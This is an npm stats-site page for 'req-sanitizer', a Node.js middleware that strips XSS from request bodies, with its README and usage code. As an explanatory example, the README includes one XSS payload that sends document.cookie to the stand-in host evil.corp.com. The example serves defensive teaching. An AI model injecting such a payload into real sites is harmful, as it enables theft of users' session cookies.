npm package discovery and stats viewer.

Discover Tips

  • General search

    [free text search, go nuts!]

  • Package details

    pkg:[package-name]

  • User packages

    @[username]

Sponsor

Optimize Toolset

I’ve always been into building performant and accessible sites, but lately I’ve been taking it extremely seriously. So much so that I’ve been building a tool to help me optimize and monitor the sites that I build to make sure that I’m making an attempt to offer the best experience to those who visit them. If you’re into performant, accessible and SEO friendly sites, you might like it too! You can check it out at Optimize Toolset.

About

Hi, 👋, I’m Ryan Hefner  and I built this site for me, and you! The goal of this site was to provide an easy way for me to check the stats on my npm packages, both for prioritizing issues and updates, and to give me a little kick in the pants to keep up on stuff.

As I was building it, I realized that I was actually using the tool to build the tool, and figured I might as well put this out there and hopefully others will find it to be a fast and useful way to search and browse npm packages as I have.

If you’re interested in other things I’m working on, follow me on Twitter or check out the open source projects I’ve been publishing on GitHub.

I am also working on a Twitter bot for this site to tweet the most popular, newest, random packages from npm. Please follow that account now and it will start sending out packages soon–ish.

Open Software & Tools

This site wouldn’t be possible without the immense generosity and tireless efforts from the people who make contributions to the world and share their work via open source initiatives. Thank you 🙏

© 2024 – Pkg Stats / Ryan Hefner

req-sanitizer

v0.2.1

Published

simple node middleware to sanitize req.body object

Downloads

467

Vulnerabilities

Powered byPowered by Snyk
  • 0High
  • 0Medium
  • 0Low

Links

Git

Maintainers

dzivenudzivenu

Keywords

nodesanitizexss

Readme

Pull requests Build status Dep tracker Codebase license

req-sanitizer

Node.js middleware to sanitize the req.body object and all its values against XSS.

What this module does

When configured right, this module sanitizes the req.body of HTML XSS on all requests with just one line of code! You can now safely processes, store and render the values without the need to re-sanitize them.

This module is built on the blazingly fast and secure XSS Filters library by Yahoo!

Warning!?

This module does not sanitize against operator injection for Mongo DB or any other DB. If you are using Mongo DB, consider including Express Mongoose Sanitize for projection against operator injection.

Installation

npm install --save req-sanitizer

Usage


var reqSanitizer = require('req-sanitizer');
Mount the middleware below the bodyParser() instantiations and above mounting of your routes

app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: false }));

// Mount first before any other req function or router
app.use(reqSanitizer()); // this line follows bodyParser() instantiations

One liner


app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: false }));

// Mount first before any other req function or router
app.use(require('req-sanitizer')()); // this line follows bodyParser() instantiations

That is all!

All your req.body values are sanitized against XSS! You can stored them directly in the DB and display them directly on HTML without the need to sanitize them again.

All input from your APIs and POST methods are sanitized. However remember you still need to sanitize for the DB. At Peer Query we use express-mongo-sanitize.

Sanitization is hard!

Did you know that you need to sanitize your content twice? One for the DB and one for HTML. Did you also know that validating does not make your data secure? Validating data type would see this script get through:

'<script>location.href='http://evil.corp.com?cookie='+document.cookie;</script>'

That is a valid string. Lets say that is what someone entered into the name input field on your site's contact form. And you assumed that only the message body could contain XSS so you sanitized only that field!

When you rendered this user's info on your site, the above script would run! At the same time, let say you tried to individually sanitize all fields with a custom sanitize() module:

var messageData = {
    name : sanitize(req.body.name),
    email : sanitize(req.body.email),
    message : sanitize(req.body.message),
    time : sanitize(req.body.time)
};

messageController.addMessage(req,res,messageData);

This would be too much bloat, without even mentioning that you would have to repeat this configuration for every single controller and API! What happens when you miss one of those fields? You are a toast. Save yourself hassle and automate this entire hassle with this module.

Sanitization is required multiples times

Mongoose and MYSQL have their own sanitizing schemes, however implementing that does not make your content secure. For a secure system you need to sanitize all input into your DB.

Sanitizing is a must for all secure web apps. Unfortunately, for Node.js there has been very scanty accurate information on the topic. A lots of Node.js sanitization libraries are either outdated or no longer maintained. In the mean while, most sanitization efforts focus on sanitizing only a single object, such data from a certain endpoint, DB or API.

Read this detailed post to get the full concept as well as the severity of the issue: 5 Steps to Handling Untrusted Node.js Data

Contribution is welcome.

I was inspired to build it after finding out that there was virtually no plug-and-play middleware for Node.js to sanitize the req.body.